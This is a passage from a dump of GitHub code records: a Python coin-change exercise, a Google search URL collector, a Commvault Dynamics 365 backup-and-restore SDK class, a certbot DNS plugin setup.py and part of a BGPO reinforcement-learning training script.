25\nremainingAmount = remainingAmount % 25\n\n# Find the number of dimes in the remaining amount\nnumberOfDimes = remainingAmount // 10\nremainingAmount = remainingAmount % 10\n\n# Find the number of nickels in the remaining amount\nnumberOfNickels = remainingAmount // 5\nremainingAmount = remainingAmount % 5\n\n# Find the number of pennies in the remaining amount\nnumberOfPennies = remainingAmount\n\n# Display the results\nprint(\"Your amount\", amount, \"consists of\\n\", \"\\t\", numberOfOneDollars, \"dollars\\n\", \"\\t\", \\\n numberOfQuarters, \"quarters\\n\", \"\\t\", numberOfDimes, \"dimes\\n\", \"\\t\", numberOfNickels, \"nickels\\n\" \\\n \"\\t\", numberOfPennies, \"pennies\")\n'''\n这个程序里有一个计算精度问题,将浮点数转换成整型时可能会损失数字的精度,例如下面的例子:\nEnter an amount, for example, 11.56: 10.03\nYour amount 10.03 consists of\n \t 10 dollars\n \t 0 quarters\n \t 0 dimes\n \t 0 nickels\n\t 2 pennies\n\nProcess finished with exit code 0\n\n解决问题的一个方法是输入以美分表示的整型数值。\n'''\n","repo_name":"ic1396/LearnPython","sub_path":"ComputeChange.py","file_name":"ComputeChange.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74484783734","text":"from googlesearch.googlesearch import GoogleSearch\nimport sys\n\nquery = \"How to make a sql query with user input from {0}\".format(sys.argv[1])\nresponse = GoogleSearch().search(query, num_results = 100)\nnewfile = \"{0}.txt\".format(sys.argv[1])\nfd = open(newfile, 'a')\nfor result in response.results:\n\tfd.write(result.url + '\\n')\nfd.close()\n","repo_name":"AURQUIZ/Web-Crawler","sub_path":"webCrawler.py","file_name":"webCrawler.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34875718503","text":"from ...exception import SDKException\n\nfrom ..casubclient import CloudAppsSubclient\n\n\nclass MSDynamics365Subclient(CloudAppsSubclient):\n \"\"\"\n Class representing a MS Dynamics 365 subclient.\n Class has been derived from the CloudAppsSubclient.\n \"\"\"\n\n def __init__(self, backupset_object, subclient_name, subclient_id=None):\n \"\"\"Initialize the Subclient object for the given MSDynamics365 Subclient.\n\n Args:\n backupset_object (object) -- instance of the backup-set class\n\n subclient_name (str) -- subclient name\n\n subclient_id (int) -- subclient id\n\n \"\"\"\n super(MSDynamics365Subclient, self).__init__(\n backupset_object, subclient_name, subclient_id)\n\n self._instance_object = backupset_object._instance_object\n self._client_object = self._instance_object._agent_object._client_object\n self._associated_tables: dict = dict()\n self._associated_environments: dict = dict()\n self._discovered_environments: dict = dict()\n self._discovered_tables: dict = dict()\n self._instance_type: int = 35\n self._app_id: int = 134\n # App ID for cloud apps\n self._Dynamics365_SET_USER_POLICY_ASSOCIATION = self._commcell_object._services['SET_USER_POLICY_ASSOCIATION']\n\n def _get_subclient_properties(self):\n \"\"\"Gets the subclient related properties of a MS Dynamics 365 subclient\"\"\"\n super(MSDynamics365Subclient, self)._get_subclient_properties()\n\n def _get_subclient_properties_json(self):\n \"\"\"get the all subclient related properties of this subclient.\n\n Returns:\n dict - all subclient properties put inside a dict\n\n \"\"\"\n\n return {'subClientProperties': self._subclient_properties}\n\n def discover_tables(self):\n \"\"\"\n Method to get the tables discovered from the MS Dynamics 365 CRM subclient\n\n Returns:\n discovered_tables (dict)-- Dictionary of returned tables\n\n \"\"\"\n self._discovered_tables = self._instance_object.discover_content(environment_discovery=False)\n return self._discovered_tables\n\n def discover_environments(self):\n \"\"\"\n Method to get the environments discovered from the Dynamics 365 CRM subclient\n\n Returns:\n discovered_environments (dict)-- Dictionary of discovered environments\n\n \"\"\"\n self._discovered_environments = self._instance_object.discover_content(environment_discovery=True)\n return self._discovered_environments\n\n @property\n def discovered_environments(self):\n \"\"\"\n Property to get the environments discovered by the Dynamics 365 subclient.\n\n If updated list is required, call refresh method prior to using this property.\n\n Returns:\n discovered_environments (dict)-- Dictionary of discovered environments\n \"\"\"\n if not bool(self._discovered_environments):\n self.discover_environments()\n return self._discovered_environments\n\n @property\n def discovered_tables(self):\n \"\"\"\n Property to get the tables discovered by the Dynamics 365 subclient.\n\n If updated list is required, call refresh method prior to using this property.\n\n Returns:\n discovered_tables (dict)-- Dictionary of discovered tables\n \"\"\"\n if not bool(self._discovered_tables):\n self.discover_tables()\n return self._discovered_tables\n\n def _get_associated_content(self, is_environment=False):\n \"\"\"\n Method to get the content associated with a Dynamics 365 CRM subclient\n\n Arguments:\n is_environment (bool)-- Whether to get the associated environments or tables\n Default Value:\n False\n Returns the associated tables\n\n Returns:\n associated_content_list (list)-- List of content associated with the client\n Format:\n Each list element will be a dictionary denoting that particular environment/ table\n \"\"\"\n discover_by_type: int\n if is_environment is True:\n discover_by_type = 5\n else:\n discover_by_type = 14\n\n _GET_ASSOCIATED_CONTENT = self._services['USER_POLICY_ASSOCIATION']\n request_json = {\n \"discoverByType\": discover_by_type,\n \"bIncludeDeleted\": False,\n \"cloudAppAssociation\": {\n \"subclientEntity\": {\n \"subclientId\": int(self.subclient_id)\n }\n }\n }\n flag, response = self._cvpysdk_object.make_request(\n 'POST', _GET_ASSOCIATED_CONTENT, request_json\n )\n if flag:\n if response and response.json():\n no_of_records = int()\n if 'associations' in response.json():\n no_of_records = response.json().get('associations', [])[0].get('pagingInfo', {}). \\\n get('totalRecords', -1)\n\n associations = response.json().get('associations', [])\n content_list = list()\n if discover_by_type == 5:\n for environment in associations:\n environment_name = environment.get(\"groups\", {}).get(\"name\")\n env_dict = {\n \"name\": environment_name,\n \"id\": environment.get(\"groups\", {}).get(\"id\"),\n \"userAccountInfo\": environment.get(\"userAccountInfo\", {}),\n \"plan\": environment.get(\"plan\", {}),\n \"is_environment\": True\n }\n content_list.append(env_dict)\n\n elif discover_by_type == 14:\n for table in associations:\n table_name = table.get(\"userAccountInfo\", {}).get(\"displayName\")\n table_dict = {\n \"name\": table_name.lower(),\n \"environment_name\": table.get(\"userAccountInfo\", {}).get(\"ParentWebGuid\", \"\").lower(),\n \"userAccountInfo\": table.get(\"userAccountInfo\", {}),\n \"plan\": table.get(\"plan\", {}),\n \"is_environment\": False\n }\n content_list.append(table_dict)\n return content_list\n # return content_list, no_of_records\n return {}, 0\n raise SDKException('Response', '101', self._update_response_(response.text))\n\n def get_associated_tables(self, refresh: bool = False):\n \"\"\"\n Method to get the tables associated with a Dynamics 365 CRM client\n\n Arguments:\n refresh (bool)-- Whether to refresh the dictionary contents\n If True\n get associated environments, will fetch the latest associations and return them\n\n Returns:\n associated_tables (list)-- List of tables associated with the client\n Format:\n Each list element will be a dictionary denoting that particular table\n Dictionary keys/ format will be:\n name : name of the table\n environment_name : name of the environment to which the table belongs to\n plan: Dynamics 365 plan used for content association\n is_environment: False for a Table\n userAccountInfo: Metadata info for that table\n\n Sample Response:\n {\n 'name': 'account',\n 'environment_name': 'sample-environment-name',\n 'userAccountInfo':\n {\n 'aliasName': 'https://.crm.dynamics.com/api/data/v9.1/account',\n 'displayName': 'Account,\n 'ParentWebGuid': 'org-environment-name',\n 'lastBackupJobRanTime': {'time': },\n 'IdxCollectionTime': {'time': },\n 'user': {\n '_type_': 13,\n 'userGUID': '>'\n }\n },\n 'plan': {\n 'planName': '', 'planId': },\n 'is_environment': False\n }\n Environment name/ URL in the sample response is for description purpose only\n\n \"\"\"\n if refresh is True:\n self._associated_tables = self._get_associated_content(is_environment=False)\n return self._associated_tables\n\n def get_associated_environments(self, refresh: bool = False):\n \"\"\"\n Method to get the environments associated with a Dynamics 365 CRM client\n\n Arguments:\n refresh (bool)-- Whether to refresh the dictionary contents\n If True\n get associated environments, will fetch the latest associations and return them\n\n Returns:\n associated_environments (list)-- List of environments associated with the client\n Format:\n Each list element will be a dictionary denoting that particular environment\n Dictionary keys/ format will be:\n name : name of the table\n plan: Dynamics 365 plan used for content association\n is_environment: True for an environment\n userAccountInfo: Metadata info for that environment\n\n Sample Response:\n {\n 'name': 'sample-environment-name',\n 'id': '>',\n 'userAccountInfo':\n {\n 'aliasName': 'https://.crm.dynamics.com',\n 'itemType': 0,\n 'ItemClassification': 0,\n 'displayName': 'org-environment-display-name',\n 'BackupSetId': 0,\n 'isAutoDiscoveredUser': False,\n 'lastBackupJobRanTime': 'time': ,\n 'IdxCollectionTime': {'time': },\n user': {\n '_type_': 13,\n 'userGUID': ''\n }\n },\n 'plan': {'planName': '', 'planId': },\n 'is_environment': True}\n\n \"\"\"\n if refresh is True:\n self._associated_environments = self._get_associated_content(is_environment=True)\n return self._associated_environments\n\n def _set_association_json(self, is_environment: bool = False):\n \"\"\"\n JSON to set the content association for a Dynamics 365 CRM client\n\n Arguments:\n is_environment (bool): Whether the content to be associated is an environment\n Default Value:\n False\n Returns:\n set_content_association_json (dict)-- Content Association JSON\n \"\"\"\n set_content_association_json = {\"LaunchAutoDiscovery\": is_environment,\n \"cloudAppAssociation\": {\n \"accountStatus\": 0,\n \"cloudAppDiscoverinfo\": {\n \"userAccounts\": [\n ],\n \"groups\": [],\n \"discoverByType\": 14 if is_environment is False else 15\n }\n , \"subclientEntity\": self._subClientEntity}}\n\n return set_content_association_json\n\n def _set_content_association(self, content_json: dict):\n \"\"\"\n Method to associate some content to a Dynamics 365 CRM client...\n\n Arguments:\n content_json (dict)-- Association JSON to be used for the content\n \"\"\"\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', self._Dynamics365_SET_USER_POLICY_ASSOCIATION, content_json\n )\n\n if flag:\n try:\n if response.json():\n if response.json().get('resp', {}).get('errorCode', 0) != 0:\n error_message = response.json()['errorMessage']\n output_string = 'Failed to Create Association for a Dynamics 365 CRM client\\nError: \"{0}\"'\n raise SDKException(\n 'Subclient', '102', output_string.format(error_message)\n )\n else:\n self.refresh()\n except ValueError:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _table_association_info_json(self, tables_list: list):\n \"\"\"\n Private Method to create the association JSON for associating tables\n to a Dynamics 365 CRM client.\n\n Arguments:\n tables_list (list)-- List of tables to be associated to the content\n List Format:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be associated\n\n Returns:\n tables_info (list)-- List of metadata info for the tables to be used for associating content\n \"\"\"\n tables_info: list = list()\n _discovered_tables = self.discovered_tables\n\n if not bool(_discovered_tables):\n raise SDKException('Subclient', '101',\n \"Discovered Tables is Empty.\")\n\n for _table in _discovered_tables:\n _table_name, _parent_env_name = _table[\"displayName\"].lower(), _table[\"ParentWebGuid\"].lower()\n try:\n if (_parent_env_name, _table_name) in tables_list:\n _table_assoc_info = _table\n _table_assoc_info[\"user.userGUID\"] = _table.get(\"user\").get(\"userGUID\")\n tables_info.append(_table_assoc_info)\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For Associating tables, content list should be a list of tuples\")\n\n if len(tables_info) == 0:\n raise SDKException(\"Subclient\", \"101\", \"None of the input tables were in the list of discovered tables\")\n\n return tables_info\n\n def set_table_associations(self, tables_list: list, plan_name: str = str()):\n \"\"\"\n Method to add table associations\n to a Dynamics 365 CRM client.\n\n Arguments:\n tables_list (list)-- List of tables to be associated to the content\n List Format:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be associated\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n plan_name (str)-- Name of the Dynamics 365 Plan to be used for content association\n \"\"\"\n\n plan_id = int(self._commcell_object.plans[plan_name.lower()])\n\n tables_info = self._table_association_info_json(tables_list=tables_list)\n\n _table_association_json = self._set_association_json(is_environment=False)\n _table_association_json[\"cloudAppAssociation\"][\"plan\"] = {\n \"planId\": plan_id\n }\n _table_association_json[\"cloudAppAssociation\"][\"cloudAppDiscoverinfo\"][\"userAccounts\"] = tables_info\n self._set_content_association(content_json=_table_association_json)\n\n def _environment_association_info_json(self, environments_name: list):\n \"\"\"\n Method to create the association JSON for associating environments\n to a Dynamics 365 CRM client.\n\n Arguments:\n environments_name (list)-- List of environments to be associated to the content\n List Format:\n Each list element should be a string of the name of the environment\n\n Returns:\n environments_info (list)-- List of metadata info for the environments to\n be used for associating content\n \"\"\"\n environments_info: list = list()\n _discovered_envs = self.discovered_environments\n\n if not bool(_discovered_envs):\n raise SDKException('Subclient', '101',\n \"Discovered Environments List is Empty\")\n\n for environment in _discovered_envs:\n if environment[\"displayName\"] in environments_name:\n _env_assoc_info = environment\n _env_assoc_info[\"user.userGUID\"] = environment.get(\"user\").get(\"userGUID\")\n _env_assoc_info[\"rawCommonFlag\"] = environment.get(\"commonFlags\", 0)\n\n environments_info.append(_env_assoc_info)\n\n if len(environments_info) == 0:\n raise SDKException(\"Subclient\", \"101\",\n \"None of the input environments were in the list of discovered environments\")\n\n return environments_info\n\n def set_environment_associations(self, environments_name: list, plan_name: str = str()):\n \"\"\"\n Method to add environment associations\n to a Dynamics 365 CRM client.\n\n Arguments:\n environments_name (list)-- List of environments to be associated to the content\n List Format:\n Each list element should be a string of the name of the environment\n Sample Values:\n ['testenv1' , 'testenv2', 'testenv3']\n\n plan_name (str)-- Name of the Dynamics 365 Plan to be used for content association\n \"\"\"\n environments_info: list = self._environment_association_info_json(environments_name=environments_name)\n\n if self._commcell_object.plans.has_plan(plan_name.lower()):\n plan_id = int(self._commcell_object.plans[plan_name.lower()])\n\n else:\n raise SDKException(\"Subclient\", \"101\",\n \"Dynamics 365 Plan does not exist\")\n\n _env_association_json = self._set_association_json(is_environment=True)\n _env_association_json[\"cloudAppAssociation\"][\"plan\"] = {\n \"planId\": plan_id\n }\n _env_association_json[\"cloudAppAssociation\"][\"cloudAppDiscoverinfo\"][\"userAccounts\"] = environments_info\n self._set_content_association(content_json=_env_association_json)\n\n def _json_for_backup_task(self, content_list: list, is_environment: bool = False):\n \"\"\"\n Method to create the association JSON for backing up content for a Dynamics 365 subclient\n\n Arguments:\n content_list (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type content or table type\n\n Returns:\n _backup_task_json (list)-- JSON for backing up the content\n \"\"\"\n _backup_task_json = self._backup_json('Full', False, '')\n _sub_client_content_json = self._backup_content_json(content_list=content_list, is_environment=is_environment)\n\n backup_options = {\n 'backupLevel': 2, # Incremental\n 'cloudAppOptions': {\n 'userAccounts': _sub_client_content_json\n }\n }\n _backup_task_json['taskInfo']['subTasks'][0]['options']['backupOpts'] = backup_options\n return _backup_task_json\n\n def _backup_content_json(self, content_list: list, is_environment: bool = False):\n \"\"\"\n Method to fetch the metadata properties for backing up content for a Dynamics 365 subclient\n\n Arguments:\n content_list (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type content or table type\n\n Returns:\n _bkp_content_json (list)-- Metadata JSON for backing up that content\n \"\"\"\n _bkp_content_json = list()\n\n if is_environment is True:\n for environment in self.get_associated_environments(refresh=True):\n if environment[\"name\"] in content_list:\n _env_bkp_info = environment[\"userAccountInfo\"]\n _bkp_content_json.append(_env_bkp_info)\n\n elif is_environment is False:\n for _table in self.get_associated_tables(refresh=True):\n _table_name, _parent_env_name = _table[\"name\"].lower(), _table[\"environment_name\"].lower()\n try:\n if (_parent_env_name, _table_name) in content_list:\n _table_bkp_info = _table[\"userAccountInfo\"]\n _bkp_content_json.append(_table_bkp_info)\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For backing up tables, content list should be a list of tuples\")\n\n return _bkp_content_json\n\n def _run_backup(self, backup_content: list, is_environment: bool = False):\n \"\"\"\n Method to run backup for the content of a Dynamics 365 subclient\n\n Arguments:\n backup_content (list)-- List of content to be backed up\n List Format, if content to be backed up is tables:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n List Format, if content to be associated is environments:\n Each list element should be a string of the name of the environment\n\n is_environment (bool)-- Content passed to be backed up is environment type content or table type\n\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n _backup_json = self._json_for_backup_task(content_list=backup_content, is_environment=is_environment)\n backup_endpoint = self._services['CREATE_TASK']\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\"POST\", backup_endpoint, _backup_json)\n return self._process_backup_response(flag, response)\n\n def backup_tables(self, tables_list: list):\n \"\"\"\n Method to run backup for the specified tables of a Dynamics 365 subclient\n\n Arguments:\n tables_list (list)-- List of tables to be backed up\n List Format\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be backed up\n\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n return self._run_backup(backup_content=tables_list, is_environment=False)\n\n def backup_environments(self, environments_list: list):\n \"\"\"\n Method to run backup for the specified environments of a Dynamics 365 subclient\n\n Arguments:\n environments_list (list)-- List of environments to be backed up\n List Format, for backing up specified environments:\n Each list element should be a string of the name of the environment\n Sample List:\n ['testenv1','testenv2','testenv3']\n\n Returns:\n backup_job (Job)-- CVPySDK.Job class instance for that particular backup job\n \"\"\"\n return self._run_backup(backup_content=environments_list, is_environment=True)\n\n def _restore_content_json(self):\n \"\"\"\n Restore JSON for restoring content for a Dynamics 365 subclient\n\n Returns:\n _restore_task_json (dict)-- JSON to be used for running a restore task\n \"\"\"\n _restore_task_json = {\n \"taskInfo\": {\n \"associations\": [self._subclient_properties['subClientEntity']],\n \"task\": {\n \"taskType\": 1,\n \"initiatedFrom\": 2,\n \"policyType\": 0\n },\n \"subTasks\": [\n {\n \"subTask\": {\n \"subTaskType\": 3,\n \"operationType\": 1001\n },\n \"options\": {\n \"restoreOptions\": {\n \"browseOption\": {\n \"timeRange\": {}\n },\n \"commonOptions\": {\n \"skip\": True,\n \"overwriteFiles\": False,\n \"unconditionalOverwrite\": False\n },\n \"destination\": {\n \"destAppId\": self._app_id,\n \"inPlace\": True,\n \"destClient\": {\n \"clientId\": int(self._client_object.client_id),\n \"clientName\": self._client_object.client_name\n },\n \"destPath\": []\n },\n \"fileOption\": {\n \"sourceItem\": list()\n },\n \"cloudAppsRestoreOptions\": {\n \"instanceType\": self._instance_type,\n \"d365RestoreOptions\": {\n \"restoreAllMatching\": False,\n \"restoreToDynamics365\": True,\n \"overWriteItems\": False,\n \"destLocation\": \"\",\n \"restoreUsingFindQuery\": False\n }\n }\n }\n }\n }\n ]\n }\n }\n return _restore_task_json\n\n def _get_restore_item_path(self, content_list: list, is_environment: bool = False):\n \"\"\"\n Get the complete path of the content for running a restore job\n\n Arguments:\n content_list (list)-- List of content ot be restored\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environments display name, in lower case\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n where environment name if the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n is_environment (bool)-- Whether the content is environment or tables\n Returns:\n __restore_content_list (list)-- List of complete path for running restore job for the specifiec content\n \"\"\"\n __restore_content_list = list()\n\n if is_environment is True:\n for environment in self.get_associated_environments(refresh=True):\n if environment[\"name\"] in content_list:\n _restore_id = environment[\"id\"]\n __restore_content_list.append(_restore_id)\n\n elif is_environment is False:\n for _table in self.get_associated_tables(refresh=True):\n _table_name, _parent_env_name = _table[\"name\"].lower(), _table[\"environment_name\"].lower()\n try:\n if (_parent_env_name, _table_name) in content_list:\n _id = _table.get(\"userAccountInfo\").get(\"smtpAddress\").split('/')\n _table_id = _id[-1]\n _env_id = _id[-2]\n _restore_id = f\"{_env_id}/{_table_id}\"\n __restore_content_list.append(_restore_id)\n\n except TypeError:\n raise SDKException('Subclient', '101',\n \"For restoring the tables, content list should be a list of tuples\")\n __restore_content_list = list(\n map(lambda _restore_id: f\"/tenant/{_restore_id}\", __restore_content_list)\n )\n return __restore_content_list\n\n def _prepare_in_place_restore_json(self,\n restore_content: list,\n restore_path: list = None,\n overwrite: bool = True,\n job_id: int = None,\n is_environment: bool = False\n ):\n \"\"\"\n Method to prepare JSON/ Python dict for in- place restore for the content specified.\n\n Arguments:\n restore_content (str)-- List of the content to restore\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environments display name, in lower case\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n where environment name if the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n restore_path (list)-- List of the paths of the items to restore\n Instead of passing, the restore content, restore path can be passed\n Restore path, is the path for each item, that is to be restored.\n Path is returned by the browse operation\n\n is_environment (bool)-- Whether to content to be restored is a table or an environment\n overwrite (bool)-- Skip or overwrite content\n job_id (int)-- Job ID for point in time restores\n Returns:\n _restore_content_json (dict)-- Python dict to be used for restore content request\n \"\"\"\n _restore_content_json = self._restore_content_json()\n if restore_path is None:\n restore_path = self._get_restore_item_path(content_list=restore_content, is_environment=is_environment)\n\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\"fileOption\"][\n \"sourceItem\"] = restore_path\n\n if job_id is not None:\n _job = self._commcell_object.job_controller.get(job_id)\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\"browseOption\"][\"timeRange\"][\n \"toTime\"] = _job.end_timestamp\n\n if overwrite is True:\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"commonOptions\"][\"overwriteFiles\"] = True\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"commonOptions\"][\n \"skip\"] = False\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"commonOptions\"][\n \"unconditionalOverwrite\"] = True\n _restore_content_json[\"taskInfo\"][\"subTasks\"][0][\"options\"] \\\n [\"restoreOptions\"][\"cloudAppsRestoreOptions\"] \\\n [\"d365RestoreOptions\"][\"overWriteItems\"] = True\n return _restore_content_json\n\n def restore_in_place(\n self,\n restore_content: list = None,\n restore_path: list = None,\n is_environment: bool = False,\n overwrite: bool = True,\n job_id: int = None):\n \"\"\"\n Method to run in- place restore for the content specified.\n\n Arguments:\n restore_content (str)-- List of the content to restore\n If content is environment,\n List format:\n list of strings, with each string corresponding to the environments display name, in lower case\n Sample Input:\n [ 'testenv1' , 'testenv2' , 'testenv3' ]\n\n If content is tables:\n List format:\n list of tuples, with each tuple, of the form: \"environment_name\",\"table_name\"\n where environment name if the name of the environment to which the table belongs to\n Sample input:\n [ (\"testenv1\" , \"account\") , (\"testenv2\",\"note\") , (\"testenv1\",\"attachments\")]\n\n restore_path (list)-- List of the paths of the items to restore\n Instead of passing, the restore content, restore path can be passed\n Restore path, is the path for each item, that is to be restored.\n Path is returned by the browse operation\n\n is_environment (bool)-- Whether to content to be restored is a table or an environment\n overwrite (bool)-- Skip or overwrite content\n job_id (int)-- Job ID for point in time restores\n Returns:\n restore_job (job)-- Instance of CVPySDK.Job for the restore job\n \"\"\"\n\n if restore_content is None and restore_path is None:\n raise SDKException(\"Subclient\", \"101\", \"Need to have either of restore content or restore path\")\n\n _restore_json = self._prepare_in_place_restore_json(\n restore_content=restore_content,\n restore_path=restore_path,\n is_environment=is_environment,\n job_id=job_id,\n overwrite=overwrite)\n return self._process_restore_response(_restore_json)\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/subclients/cloudapps/dynamics365_subclient.py","file_name":"dynamics365_subclient.py","file_ext":"py","file_size_in_byte":38577,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"4143958762","text":"from os import path\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nversion = \"1.0.2\"\n\ninstall_requires = [\n 'certbot>=0.31.0',\n 'dns-lexicon>=3.4.1',\n]\ntest_requirements = [\n 'mock',\n 'requests'\n]\n\n# read the contents of the README file\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\")) as f:\n long_description = f.read()\n\nsetup(\n name=\"certbot-dns-njalla\",\n version=version,\n description=\"Njalla DNS Authenticator plugin for Certbot\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n repository=\"https://github.com/chaptergy/certbot-dns-njalla\",\n author=\"Chaptergy\",\n author_email=\"26956711+chaptergy@users.noreply.github.com\",\n license=\"Apache License 2.0\",\n python_requires=\">=3.6\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Plugins\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Security\",\n \"Topic :: System :: Installation/Setup\",\n \"Topic :: System :: Networking\",\n \"Topic :: Internet :: Name Service (DNS)\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Utilities\",\n ],\n packages=find_packages(),\n install_requires=install_requires,\n tests_require=test_requirements,\n entry_points={\n \"certbot.plugins\": [\n \"dns-njalla = certbot_dns_njalla.dns_njalla:Authenticator\"\n ]\n },\n test_suite=\"certbot_dns_njalla\",\n)\n","repo_name":"chaptergy/certbot-dns-njalla","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"74780476531","text":"import torch\nimport garage\n# from garage.experiment import run_experiment\nfrom garage.experiment import LocalRunner\n# from garage.tf.envs import TfEnv\n\nfrom Policy import GaussianMLPPolicy, CategoricalMLPPolicy\nfrom Algorithms.BGPO import BGPO\nfrom gym.envs.mujoco import Walker2dEnv, HopperEnv,HalfCheetahEnv\n# from gym.envs.classic_control import CartPoleEnv\nfrom garage import wrap_experiment\nfrom garage.envs import GarageEnv, normalize\nfrom Algorithms._utils import CosLR\nfrom garage.torch.value_functions import GaussianMLPValueFunction\nfrom garage.envs.normalized_env import NormalizedEnv\nimport os.path\nfrom os import path\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='BGPO')\nparser.add_argument('--env', default='CartPole', type=str, help='choose environment from [CartPole, Walker, Hopper, HalfCheetah]')\nparser.add_argument('--type', default='Diag', type=str)\nparser.add_argument('--pow', default=2.0, type=float)\nargs = parser.parse_args()\n\n\n@wrap_experiment\ndef run_task(ctxt=None, *_):\n \"\"\"Set up environment and algorithm and run the task.\n Args:\n snapshot_config (garage.experiment.SnapshotConfig): The snapshot\n configuration used by LocalRunner to create the snapshotter.\n If None, it will create one with default settings.\n _ : Unused parameters\n \"\"\"\n\n #count = 1\n th = 1.8\n g_max = 0.05\n lam = 0.1\n grad_factor = 0.001\n n_epochs = 100\n\n runner = LocalRunner(ctxt)\n n_counts = 5\n vf_minibatch = 160\n minibatch_size = 64\n print(args.env)\n vf_lr = 2.5e-4\n entropy_method = 'max'\n stop_entropy_gradient = True\n sch = None\n m_lower = 0.3\n if args.env == 'CartPole':\n #CartPole\n\n # env = TfEnv(normalize(CartPoleEnv()))\n\n # 'CartPole-v1'\n gymenv = GarageEnv(env_name='CartPole-v1')\n\n env = gymenv\n\n\n batch_size = 5000\n max_length = 100\n\n minibatch_size = 128\n vf_minibatch = 128\n\n name = 'CartPole'\n\n if args.type == 'Diag':\n lr = 0.5\n c = 50\n w = 1\n g_max = 1.0\n lam = 7.5e-4\n grad_factor = 0.0004\n else:\n lr = 0.5\n c = 50\n w = 1\n g_max = 0.05\n grad_factor = 0.0004\n # lam = 0.001\n lam = 0.8e-3\n if args.pow != 3.0:\n lam = lam*(3.0/args.pow)*2.0\n if args.pow == 1.5:\n lam = 0.016\n #g_max = 0.03\n discount = 0.995\n model_path = './init/CartPole_policy.pth'\n\n elif args.env == 'Pendulum':\n env = GarageEnv(env_name='InvertedPendulum-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 512\n vf_minibatch = 512\n name = 'Pendulm'\n\n th = 1.2\n\n lr = 0.25\n c = 300\n w = 1\n\n\n grad_factor = 0.00025\n if args.type=='Diag':\n g_max = 1.0\n lam = 5e-4\n else:\n g_max = 0.10\n lam = 0.001\n discount = 0.99\n model_path = './init/Single_Pendulum_policy.pth'\n\n elif args.env == 'Acrobot':\n env = GarageEnv(env_name='Acrobot-v1')\n\n batch_size = 50000\n max_length = 500\n\n minibatch_size = 512\n vf_minibatch = 512\n\n name = 'Acrobot'\n\n lr = 0.0175\n c = 12000\n w = 1\n\n grad_factor = 0.00002\n if args.type == 'Diag':\n g_max = 1.0\n # lam = 0.001\n lam = 0.0005\n else:\n g_max = 0.10\n\n lam = 0.001*(3.0/args.pow)**2\n\n\n discount = 